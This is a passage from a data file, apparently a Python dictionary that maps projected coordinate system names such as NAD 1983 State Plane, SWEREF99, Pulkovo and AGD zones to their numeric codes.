'NAD_1983_CSRS_MTM_6': 2948, 'NAD_1983_CSRS_MTM_7': 2949, 'NAD_1983_CSRS_MTM_8': 2950, 'NAD_1983_CSRS_MTM_9': 2951, 'NAD_1983_CSRS_MTM_10': 2952, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2953, 'NAD_1983_CSRS_Prince_Edward_Island': 2954, 'NAD_1983_CSRS_UTM_Zone_11N': 2955, 'NAD_1983_CSRS_UTM_Zone_12N': 2956, 'NAD_1983_CSRS_UTM_Zone_13N': 2957, 'NAD_1983_CSRS_UTM_Zone_17N': 2958, 'NAD_1983_CSRS_UTM_Zone_18N': 2959, 'NAD_1983_CSRS_UTM_Zone_19N': 2960, 'NAD_1983_CSRS_UTM_Zone_20N': 2961, 'NAD_1983_CSRS_UTM_Zone_21N': 2962, 'NAD_1927_Alaska_Albers_Feet': 2964, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2965, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2966, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301_Feet': 2967, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302_Feet': 2968, 'Fort_Marigot_UTM_20N': 2969, 'Sainte_Anne_UTM_20N': 2970, 'CSG_1967_UTM_22N': 2971, 'RGFG_1995_UTM_22N': 2972, 'Fort_Desaix_UTM_20N': 2973, 'RGR_1992_UTM_40S': 2975, 'Tahiti_1952_UTM_6S': 2976, 'Tahaa_1954_UTM_5S': 2977, 'IGN72_Nuku_Hiva_UTM_7S': 2978, 'K0_1949_UTM_42S': 2979, 'Combani_1950_UTM_38S': 2980, 'IGN56_Lifou_UTM_58S': 2981, 'IGN72_Grande_Terre_UTM_58S': 2982, 'RGNC_1991_Lambert_New_Caledonia': 2984, 'Petrels_1972_Terre_Adelie_Polar_Stereographic': 2985, 'Perroud_1950_Terre_Adelie_Polar_Stereographic': 2986, 'Saint_Pierre_et_Miquelon_1950_UTM_21N': 2987, 'MOP78_UTM_1S': 2988, 'RRAF_1991_UTM_20N': 2989, 'NAD_1983_Oregon_Statewide_Lambert': 2991, 'NAD_1983_Oregon_Statewide_Lambert_Feet_Intl': 2992, 'NAD_1983_HARN_Oregon_Statewide_Lambert': 2993, 'NAD_1983_HARN_Oregon_Statewide_Lambert_Feet_Intl': 2994, 'IGN53_Mare_UTM_58S': 2995, 'ST84_Ile_des_Pins_UTM_58S': 2996, 'ST71_Belep_UTM_58S': 2997, 'NEA74_Noumea_UTM_58S': 2998, 'Grand_Comoros_UTM_38S': 2999, 'Gunung_Segara_NEIEZ': 3000, 'Batavia_NEIEZ': 3001, 'Makassar_NEIEZ': 3002, 'Monte_Mario_Italy_1': 3003, 'Monte_Mario_Italy_2': 3004, 'NAD_1983_BC_Environment_Albers': 3005, 'SWEREF99_TM': 3006, 'SWEREF99_12_00': 3007, 'SWEREF99_13_30': 3008, 'SWEREF99_15_00': 3009, 'SWEREF99_16_30': 3010, 'SWEREF99_18_00': 3011, 'SWEREF99_14_15': 3012, 'SWEREF99_15_45': 3013, 'SWEREF99_17_15': 3014, 'SWEREF99_18_45': 3015, 'SWEREF99_20_15': 3016, 'SWEREF99_21_45': 3017, 'SWEREF99_23_15': 3018, 'RT90_75_gon_V': 3019, 'RT90_5_gon_V': 3020, 'RT90_25_gon_V': 3021, 'RT90_0_gon': 3022, 'RT90_25_gon_O': 3023, 'RT90_5_gon_O': 3024, 'RT38_75_gon_V': 3025, 'RT38_5_gon_V': 3026, 'RT38_25_gon_V': 3027, 'RT38_0_gon': 3028, 'RT38_25_gon_O': 3029, 'RT38_5_gon_O': 3030, 'WGS_1984_Antarctic_Polar_Stereographic': 3031, 'WGS_1984_Australian_Antarctic_Polar_Stereographic': 3032, 'WGS_1984_Australian_Antarctic_Lambert': 3033, 'ETRS_1989_LCC': 3034, 'ETRS_1989_LAEA': 3035, 'Moznet_UTM_Zone_36S': 3036, 'Moznet_UTM_Zone_37S': 3037, 'Hjorsey_1955_UTM_Zone_26N': 3054, 'Hjorsey_1955_UTM_Zone_27N': 3055, 'Hjorsey_1955_UTM_Zone_28N': 3056, 'ISN_1993_Lambert_1993': 3057, 'Helle_1954_Jan_Mayen_Grid': 3058, 'LKS_1992_Latvia_TM': 3059, 'IGN72_Grande_Terre_UTM_58S': 3060, 'Porto_Santo_1995_UTM_Zone_28N': 3061, 'Azores_Oriental_1995_UTM_Zone_26N': 3062, 'Azores_Central_1995_UTM_Zone_26N': 3063, 'IGM_1995_UTM_Zone_32N': 3064, 'IGM_1995_UTM_Zone_33N': 3065, 'ED_1950_Jordan_TM': 3066, 'EUREF_FIN_TM35FIN': 3067, 'DHDN_Soldner_Berlin': 3068, 'NAD_1927_Wisconsin_TM': 3069, 'NAD_1983_Wisconsin_TM': 3070, 'NAD_1983_HARN_Wisconsin_TM': 3071, 'NAD_1983_Maine_2000_East_Zone': 3072, 'NAD_1983_Maine_2000_Central_Zone': 3073, 'NAD_1983_Maine_2000_West_Zone': 3074, 'NAD_1983_HARN_Maine_2000_East_Zone': 3075, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3076, 'NAD_1983_HARN_Maine_2000_West_Zone': 3077, 'NAD_1983_Michigan_GeoRef_Meters': 3078, 'NAD_1983_HARN_Michigan_GeoRef_Meters': 3079, 'NAD_1927_Texas_Statewide_Mapping_System': 3080, 'NAD_1983_Texas_Statewide_Mapping_System': 3081, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 3082, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 3083, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Lambert': 3084, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Albers': 3085, 'NAD_1983_Florida_GDL_Albers': 3086, 'NAD_1983_HARN_Florida_GDL_Albers': 3087, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 3088, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 3089, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 3090, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600_Feet': 3091, 'Tokyo_UTM_Zone_51N': 3092, 'Tokyo_UTM_Zone_52N': 3093, 'Tokyo_UTM_Zone_53N': 3094, 'Tokyo_UTM_Zone_54N': 3095, 'Tokyo_UTM_Zone_55N': 3096, 'JGD_2000_UTM_Zone_51N': 3097, 'JGD_2000_UTM_Zone_52N': 3098, 'JGD_2000_UTM_Zone_53N': 3099, 'JGD_2000_UTM_Zone_54N': 3100, 'JGD_2000_UTM_Zone_55N': 3101, 'Samoa_1962_Samoa_Lambert': 3102, 'Gulshan_303_Bangladesh_TM': 3106, 'GDA_1994_South_Australia_Lambert': 3107, 'ETRS_1989_Guernsey_Grid': 3108, 'ETRS_1989_Jersey_Transverse_Mercator': 3109, 'AGD_1966_VICGRID': 3110, 'GDA_1994_VICGRID94': 3111, 'GDA_1994_Geoscience_Australia_Lambert': 3112, 'GDA_1994_BCSG02': 3113, 'MAGNA_Colombia_Oeste_Oeste': 3114, 'MAGNA_Colombia_Oeste': 3115, 'MAGNA_Colombia_Bogota': 3116, 'MAGNA_Colombia_Este': 3117, 'MAGNA_Colombia_Este_Este': 3118, 'Douala_1948_AEF_West': 3119, 'Pulkovo_1942_Adj_1958_Poland_Zone_I': 3120, 'Philippines_Zone_I': 3121, 'Philippines_Zone_II': 3122, 'Philippines_Zone_III': 3123, 'Philippines_Zone_IV': 3124, 'Philippines_Zone_V': 3125, 'ETRS_1989_ETRS-GK19FIN': 3126, 'ETRS_1989_ETRS-GK20FIN': 3127, 'ETRS_1989_ETRS-GK21FIN': 3128, 'ETRS_1989_ETRS-GK22FIN': 3129, 'ETRS_1989_ETRS-GK23FIN': 3130, 'ETRS_1989_ETRS-GK24FIN': 3131, 'ETRS_1989_ETRS-GK25FIN': 3132, 'ETRS_1989_ETRS-GK26FIN': 3133, 'ETRS_1989_ETRS-GK27FIN': 3134, 'ETRS_1989_ETRS-GK28FIN': 3135, 'ETRS_1989_ETRS-GK29FIN': 3136, 'ETRS_1989_ETRS-GK30FIN': 3137, 'ETRS_1989_ETRS-GK31FIN': 3138, 'Fiji_1956_UTM_Zone_60S': 3141, 'Fiji_1956_UTM_Zone_1S': 3142, 'Indian_1960_UTM_Zone_48N': 3148, 'Indian_1960_UTM_Zone_49N': 3149, 'NAD_1983_CSRS_BC_Environment_Albers': 3153, 'NAD_1983_CSRS_UTM_Zone_7N': 3154, 'NAD_1983_CSRS_UTM_Zone_8N': 3155, 'NAD_1983_CSRS_UTM_Zone_9N': 3156, 'NAD_1983_CSRS_UTM_Zone_10N': 3157, 'NAD_1983_CSRS_UTM_Zone_14N': 3158, 'NAD_1983_CSRS_UTM_Zone_15N': 3159, 'NAD_1983_CSRS_UTM_Zone_16N': 3160, 'NAD_1983_Ontario_MNR_Lambert': 3161, 'NAD_1983_CSRS_Ontario_MNR_Lambert': 3162, 'RGNC_1991_93_Lambert_New_Caledonia': 3163, 'ST87_Ouvea_UTM_58S': 3164, 'NEA74_Noumea_Lambert': 3165, 'NEA74_Noumea_Lambert_2': 3166, 'RGNC_1991-93_UTM_Zone_57S': 3169, 'RGNC_1991-93_UTM_Zone_58S': 3170, 'RGNC_1991-93_UTM_Zone_59S': 3171, 'IGN53_Mare_UTM_Zone_59S': 3172, 'NAD_1983_Great_Lakes_Basin_Albers': 3174, 'NAD_1983_Great_Lakes_and_St_Lawrence_Albers': 3175, 'Indian_1960_TM_106NE': 3176, 'LGD2006_Libya_TM': 3177, 'Greenland_1996_UTM_Zone_18N': 3178, 'Greenland_1996_UTM_Zone_19N': 3179, 'Greenland_1996_UTM_Zone_20N': 3180, 'Greenland_1996_UTM_Zone_21N': 3181, 'Greenland_1996_UTM_Zone_22N': 3182, 'Greenland_1996_UTM_Zone_23N': 3183, 'Greenland_1996_UTM_Zone_24N': 3184, 'Greenland_1996_UTM_Zone_25N': 3185, 'Greenland_1996_UTM_Zone_26N': 3186, 'Greenland_1996_UTM_Zone_27N': 3187, 'Greenland_1996_UTM_Zone_28N': 3188, 'Greenland_1996_UTM_Zone_29N': 3189, 'LGD2006_Libya_TM_Zone_5': 3190, 'LGD2006_Libya_TM_Zone_6': 3191, 'LGD2006_Libya_TM_Zone_7': 3192, 'LGD2006_Libya_TM_Zone_8': 3193, 'LGD2006_Libya_TM_Zone_9': 3194, 'LGD2006_Libya_TM_Zone_10': 3195, 'LGD2006_Libya_TM_Zone_11': 3196, 'LGD2006_Libya_TM_Zone_12': 3197, 'LGD2006_Libya_TM_Zone_13': 3198, 'LGD2006_UTM_Zone_32N': 3199, 'FD_1958_Iraq': 3200, 'LGD2006_UTM_Zone_33N': 3201, 'LGD2006_UTM_Zone_34N': 3202, 'LGD2006_UTM_Zone_35N': 3203, 'WGS_1984_USGS_Transantarctic_Mountains': 3294, 'RGPF_UTM_Zone_5S': 3296, 'RGPF_UTM_Zone_6S': 3297, 'RGPF_UTM_Zone_7S': 3298, 'RGPF_UTM_Zone_8S': 3299, 'Estonian_Coordinate_System_of_1992': 3300, 'Estonia_1997_Estonia_National_Grid': 3301, 'IGN63_Hiva_Oa_UTM_Zone_7S': 3302, 'Fatu_Iva_1972_UTM_Zone_7S': 3303, 'Tahiti_1979_UTM_Zone_6S': 3304, 'Moorea_1987_UTM_Zone_6S': 3305, 'Maupiti_1983_UTM_Zone_5S': 3306, 'Nakhl-e_Ghanem_UTM_Zone_39N': 3307, 'GDA_1994_NSW_lambert': 3308, 'NAD_1927_California_Teale_Albers': 3309, 'NAD_1983_California_Teale_Albers': 3310, 'NAD_1983_HARN_California_Teale_Albers': 3311, 'CSG_1967_UTM_Zone_21N': 3312, 'RGFG_1995_UTM_Zone_21N': 3313, 'Katanga_1955_Katanga_Lambert': 3314, 'Katanga_1955_Katanga_TM': 3315, 'Kasai_1953_Congo_TM_Zone_22': 3316, 'Kasai_1953_Congo_TM_Zone_24': 3317, 'IGC_1962_Congo_TM_Zone_12': 3318, 'IGC_1962_Congo_TM_Zone_14': 3319, 'IGC_1962_Congo_TM_Zone_16': 3320, 'IGC_1962_Congo_TM_Zone_18': 3321, 'IGC_1962_Congo_TM_Zone_20': 3322, 'IGC_1962_Congo_TM_Zone_22': 3323, 'IGC_1962_Congo_TM_Zone_24': 3324, 'IGC_1962_Congo_TM_Zone_26': 3325, 'IGC_1962_Congo_TM_Zone_28': 3326, 'IGC_1962_Congo_TM_Zone_30': 3327, 'Pulkovo_1942_Adj_1958_GUGiK-80': 3328, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_5': 3329, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_6': 3330, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_7': 3331, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_8': 3332, 'Pulkovo_1942_Adj_1958_GK_Zone_3': 3333, 'Pulkovo_1942_Adj_1958_GK_Zone_4': 3334, 'Pulkovo_1942_Adj_1958_GK_Zone_5': 3335, 'Kerguelen_Island_1949_UTM_42S': 3336, 'Le_Pouce_1934_Mauritius_Grid': 3337, 'NAD_1983_Alaska_Albers': 3338, 'IGCB_1955_Congo_TM_Zone_12': 3339, 'IGCB_1955_Congo_TM_Zone_14': 3340, 'IGCB_1955_Congo_TM_Zone_16': 3341, 'IGCB_1955_UTM_Zone_33S': 3342, 'Mauritania_1999_UTM_Zone_28N': 3343, 'Mauritania_1999_UTM_Zone_29N': 3344, 'Mauritania_1999_UTM_Zone_30N': 3345, 'LKS_1994_Lithuania_TM': 3346, 'NAD_1983_Statistics_Canada_Lambert': 3347, 'NAD_1983_CSRS_Statistics_Canada_Lambert': 3348, 'WGS_1984_PDC_Mercator': 3349, 'Pulkovo_1942_CS63_Zone_K0': 3350, 'Pulkovo_1942_CS63_Zone_K1': 3351, 'Pulkovo_1942_CS63_Zone_K2': 3352, 'Mhast_Onshore_UTM_Zone_32S': 3353, 'Mhast_Offshore_UTM_Zone_32S': 3354, 'Egypt_Gulf_of_Suez_S-650_TL_Red_Belt': 3355, 'Grand_Cayman_1959_UTM_Zone_17N': 3356, 'Little_Cayman_1961_UTM_Zone_17N': 3357, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200': 3358, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3359, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900': 3360, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 3361, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701': 3362, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 3363, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702': 3364, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 3365, 'Hong_Kong_1963_Grid_System': 3366, 'IGN_Astro_1960_UTM_Zone_28N': 3367, 'IGN_Astro_1960_UTM_Zone_29N': 3368, 'IGN_Astro_1960_UTM_Zone_30N': 3369, 'NAD_1927_UTM_Zone_59N': 3370, 'NAD_1927_UTM_Zone_60N': 3371, 'NAD_1983_UTM_Zone_59N': 3372, 'NAD_1983_UTM_Zone_60N': 3373, 'FD_1954_UTM_Zone_29N': 3374, 'GDM_2000_MRSO_Peninsular_Malaysia': 3375, 'GDM_2000_BRSO_East_Malaysia': 3376, 'GDM_2000_State_Cassini_Johor': 3377, 'GDM_2000_State_Cassini_Negeri_Sembilan_&_Melaka': 3378, 'GDM_2000_State_Cassini_Pahang': 3379, 'GDM_2000_State_Cassini_Selangor': 3380, 'GDM_2000_State_Cassini_Terengganu': 3381, 'GDM_2000_State_Cassini_Pulau_Pinang_&_Seberang_Perai': 3382, 'GDM_2000_State_Cassini_Perlis': 3383, 'GDM_2000_State_Cassini_Perak': 3384, 'GDM_2000_State_Cassini_Kelantan': 3385, 'KKJ_Finland_Zone_0': 3386, 'KKJ_Finland_Zone_5': 3387, 'Pulkovo_1942_Caspian_Sea_Mercator': 3388, 'Karbala_1979_Polservice_UTM_Zone_37N': 3391, 'Karbala_1979_Polservice_UTM_Zone_38N': 3392, 'Karbala_1979_Polservice_UTM_Zone_39N': 3393, 'Nahrwan_1934_Iraq_Zone': 3394, 'WGS_1984_World_Mercator': 3395, 'PD/83_GK_Zone_3': 3396, 'PD/83_GK_Zone_4': 3397, 'RD/83_GK_Zone_4': 3398, 'RD/83_GK_Zone_5': 3399, 'NAD_1983_10TM_AEP_Forest': 3400, 'NAD_1983_10TM_AEP_Resource': 3401, 'NAD_1983_CSRS_10TM_AEP_Forest': 3402, 'NAD_1983_CSRS_10TM_AEP_Resource': 3403, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3404, 'VN_2000_UTM_Zone_48N': 3405, 'VN_2000_UTM_Zone_49N': 3406, 'Hong_Kong_1963_Grid_System': 3407, 'NSIDC_EASE_Grid_North': 3408, 'NSIDC_EASE_Grid_South': 3409, 'NSIDC_EASE_Grid_Global': 3410, 'NSIDC_Sea_Ice_Polar_Stereographic_North': 3411, 'NSIDC_Sea_Ice_Polar_Stereographic_South': 3412, 'WGS_1984_NSIDC_Sea_Ice_Polar_Stereographic_North': 3413, 'SVY21_Singapore_TM': 3414, 'WGS_1972_BE_South_China_Sea_Lambert': 3415, 'ETRS_1989_Austria_Lambert': 3416, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 3417, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 3418, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 3419, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 3420, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 3421, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 3422, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 3423, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 3424, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401_Feet': 3425, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402_Feet': 3426, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501_Feet': 3427, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502_Feet': 3428, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701_Feet': 3429, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702_Feet': 3430, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703_Feet': 3431, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900_Feet': 3432, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 3433, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 3434, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 3435, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 3436, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 3437, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 3438, 'PDO_1993_UTM_Zone_39N': 3439, 'PDO_1993_UTM_Zone_40N': 3440, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301_Feet': 3441, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302_Feet': 3442, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201_Feet': 3443, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202_Feet': 3444, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800_Feet': 3445, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800_Feet': 3446, 'Belge_Lambert_2005': 3447, 'JAD_2001_Jamaica_Grid': 3448, 'JAD_2001_UTM_Zone_17N': 3449, 'JAD_2001_UTM_Zone_18N': 3450, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703_Feet': 3453, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701_Feet': 3456, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702_Feet': 3457, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001_Feet': 3458, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002_Feet': 3459, 'Fiji_1986_Fiji_Map_Grid': 3460, 'Dabola_1981_UTM_Zone_28N': 3461, 'Dabola_1981_UTM_Zone_29N': 3462, 'NAD_1983_Maine_2000_Central_Zone': 3463, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3464, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 3560, 'Old_Hawaiian_StatePlane_Hawaii_1_FIPS_5101': 3561, 'Old_Hawaiian_StatePlane_Hawaii_2_FIPS_5102': 3562, 'Old_Hawaiian_StatePlane_Hawaii_3_FIPS_5103': 3563, 'Old_Hawaiian_StatePlane_Hawaii_4_FIPS_5104': 3564, 'Old_Hawaiian_StatePlane_Hawaii_5_FIPS_5105': 3565, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 3566, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 3567, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet': 3568, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet': 3569, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet': 3570, 'WGS_1984_North_Pole_LAEA_Bering_Sea': 3571, 'WGS_1984_North_Pole_LAEA_Alaska': 3572, 'WGS_1984_North_Pole_LAEA_Canada': 3573, 'WGS_1984_North_Pole_LAEA_Atlantic': 3574, 'WGS_1984_North_Pole_LAEA_Europe': 3575, 'WGS_1984_North_Pole_LAEA_Russia': 3576, 'GDA_1994_Australia_Albers': 3577, 'NAD_1983_Yukon_Albers': 3578, 'NAD_1983_CSRS_Yukon_Albers': 3579, 'NAD_1983_Northwest_Territories_Lambert': 3580, 'NAD_1983_CSRS_Northwest_Territories_Lambert': 3581, 'Reunion_1947_TM_Reunion': 3727, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 3734, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 3735, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 3736, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3737, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3738, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 3739, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401_Feet': 3753, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402_Feet': 3754, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901_Feet': 3755, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3756, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3757, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904_Feet': 3758, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 3759, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 3760, 'NAD_1983_CSRS_UTM_Zone_22N': 3761, 'WGS_1984_South_Georgia_Lambert': 3762, 'ETRS_1989_Portugal_TM06': 3763, 'Puerto_Rico_UTM_Zone_20N': 3920, 'Puerto_Rico_StatePlane_Puerto_Rico_FIPS_5201': 3991, 'Puerto_Rico_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 3992, 'Pulkovo_1995_GK_Zone_2': 20002, 'Pulkovo_1995_GK_Zone_3': 20003, 'Pulkovo_1995_GK_Zone_4': 20004, 'Pulkovo_1995_GK_Zone_5': 20005, 'Pulkovo_1995_GK_Zone_6': 20006, 'Pulkovo_1995_GK_Zone_7': 20007, 'Pulkovo_1995_GK_Zone_8': 20008, 'Pulkovo_1995_GK_Zone_9': 20009, 'Pulkovo_1995_GK_Zone_10': 20010, 'Pulkovo_1995_GK_Zone_11': 20011, 'Pulkovo_1995_GK_Zone_12': 20012, 'Pulkovo_1995_GK_Zone_13': 20013, 'Pulkovo_1995_GK_Zone_14': 20014, 'Pulkovo_1995_GK_Zone_15': 20015, 'Pulkovo_1995_GK_Zone_16': 20016, 'Pulkovo_1995_GK_Zone_17': 20017, 'Pulkovo_1995_GK_Zone_18': 20018, 'Pulkovo_1995_GK_Zone_19': 20019, 'Pulkovo_1995_GK_Zone_20': 20020, 'Pulkovo_1995_GK_Zone_21': 20021, 'Pulkovo_1995_GK_Zone_22': 20022, 'Pulkovo_1995_GK_Zone_23': 20023, 'Pulkovo_1995_GK_Zone_24': 20024, 'Pulkovo_1995_GK_Zone_25': 20025, 'Pulkovo_1995_GK_Zone_26': 20026, 'Pulkovo_1995_GK_Zone_27': 20027, 'Pulkovo_1995_GK_Zone_28': 20028, 'Pulkovo_1995_GK_Zone_29': 20029, 'Pulkovo_1995_GK_Zone_30': 20030, 'Pulkovo_1995_GK_Zone_31': 20031, 'Pulkovo_1995_GK_Zone_32': 20032, 'Pulkovo_1995_GK_Zone_2N': 20062, 'Pulkovo_1995_GK_Zone_3N': 20063, 'Pulkovo_1995_GK_Zone_4N': 20064, 'Pulkovo_1995_GK_Zone_5N': 20065, 'Pulkovo_1995_GK_Zone_6N': 20066, 'Pulkovo_1995_GK_Zone_7N': 20067, 'Pulkovo_1995_GK_Zone_8N': 20068, 'Pulkovo_1995_GK_Zone_9N': 20069, 'Pulkovo_1995_GK_Zone_10N': 20070, 'Pulkovo_1995_GK_Zone_11N': 20071, 'Pulkovo_1995_GK_Zone_12N': 20072, 'Pulkovo_1995_GK_Zone_13N': 20073, 'Pulkovo_1995_GK_Zone_14N': 20074, 'Pulkovo_1995_GK_Zone_15N': 20075, 'Pulkovo_1995_GK_Zone_16N': 20076, 'Pulkovo_1995_GK_Zone_17N': 20077, 'Pulkovo_1995_GK_Zone_18N': 20078, 'Pulkovo_1995_GK_Zone_19N': 20079, 'Pulkovo_1995_GK_Zone_20N': 20080, 'Pulkovo_1995_GK_Zone_21N': 20081, 'Pulkovo_1995_GK_Zone_22N': 20082, 'Pulkovo_1995_GK_Zone_23N': 20083, 'Pulkovo_1995_GK_Zone_24N': 20084, 'Pulkovo_1995_GK_Zone_25N': 20085, 'Pulkovo_1995_GK_Zone_26N': 20086, 'Pulkovo_1995_GK_Zone_27N': 20087, 'Pulkovo_1995_GK_Zone_28N': 20088, 'Pulkovo_1995_GK_Zone_29N': 20089, 'Pulkovo_1995_GK_Zone_30N': 20090, 'Pulkovo_1995_GK_Zone_31N': 20091, 'Pulkovo_1995_GK_Zone_32N': 20092, 'Adindan_UTM_Zone_35N': 20135, 'Adindan_UTM_Zone_36N': 20136, 'Adindan_UTM_Zone_37N': 20137, 'Adindan_UTM_Zone_38N': 20138, 'AGD_1966_AMG_Zone_48': 20248, 'AGD_1966_AMG_Zone_49': 20249, 'AGD_1966_AMG_Zone_50': 20250, 'AGD_1966_AMG_Zone_51': 20251, 'AGD_1966_AMG_Zone_52': 20252, 'AGD_1966_AMG_Zone_53': 20253, 'AGD_1966_AMG_Zone_54': 20254, 'AGD_1966_AMG_Zone_55': 20255, 'AGD_1966_AMG_Zone_56': 20256, 'AGD_1966_AMG_Zone_57': 20257, 'AGD_1966_AMG_Zone_58': 20258, 'AGD_1984_AMG_Zone_48': 20348, 'AGD_1984_AMG_Zone_49': 20349, 'AGD_1984_AMG_Zone_50': 20350, 'AGD_1984_AMG_Zone_51': 20351, 'AGD_1984_AMG_Zone_52': 20352, 'AGD_1984_AMG_Zone_53': 20353, 'AGD_1984_AMG_Zone_54': 20354, 'AGD_1984_AMG_Zone_55': 20355, 'AGD_1984_AMG_Zone_56': 20356, 'AGD_1984_AMG_Zone_57': 20357, 'AGD_1984_AMG_Zone_58': 20358, 'Ain_el_Abd_UTM_Zone_36N': 20436, 'Ain_el_Abd_UTM_Zone_37N': 20437, 'Ain_el_Abd_UTM_Zone_38N': 20438, 'Ain_el_Abd_UTM_Zone_39N': 20439, 'Ain_el_Abd_UTM_Zone_40N': 20440, 'Bahrain_State_Grid': 20499, 'Afgooye_UTM_Zone_38N': 20538, 'Afgooye_UTM_Zone_39N': 20539, 'Portuguese_National_Grid': 20790, 'Aratu_UTM_Zone_22S': 20822, 'Aratu_UTM_Zone_23S': 20823, 'Aratu_UTM_Zone_24S': 20824, 'Arc_1950_UTM_Zone_34S': 20934, 'Arc_1950_UTM_Zone_35S': 20935, 'Arc_1950_UTM_Zone_36S': 20936, 'Arc_1960_UTM_Zone_35S': 21035, 'Arc_1960_UTM_Zone_36S': 21036, 'Arc_1960_UTM_Zone_37S': 21037, 'Arc_1960_UTM_Zone_35N': 21095, 'Arc_1960_UTM_Zone_36N': 21096, 'Arc_1960_UTM_Zone_37N': 21097, 'Batavia_UTM_Zone_48S': 21148, 'Batavia_UTM_Zone_49S': 21149, 'Batavia_UTM_Zone_50S': 21150, 'Barbados_1938_British_West_Indies_Grid': 21291, 'Barbados_1938_Barbados_Grid': 21292, 'Beijing_1954_GK_Zone_13': 21413, 'Beijing_1954_GK_Zone_14': 21414, 'Beijing_1954_GK_Zone_15': 21415, 'Beijing_1954_GK_Zone_16': 21416, 'Beijing_1954_GK_Zone_17': 21417, 'Beijing_1954_GK_Zone_18': 21418, 'Beijing_1954_GK_Zone_19': 21419, 'Beijing_1954_GK_Zone_20': 21420, 'Beijing_1954_GK_Zone_21': 21421, 'Beijing_1954_GK_Zone_22': 21422, 'Beijing_1954_GK_Zone_23': 21423, 'Beijing_1954_GK_Zone_13N': 21473, 'Beijing_1954_GK_Zone_14N': 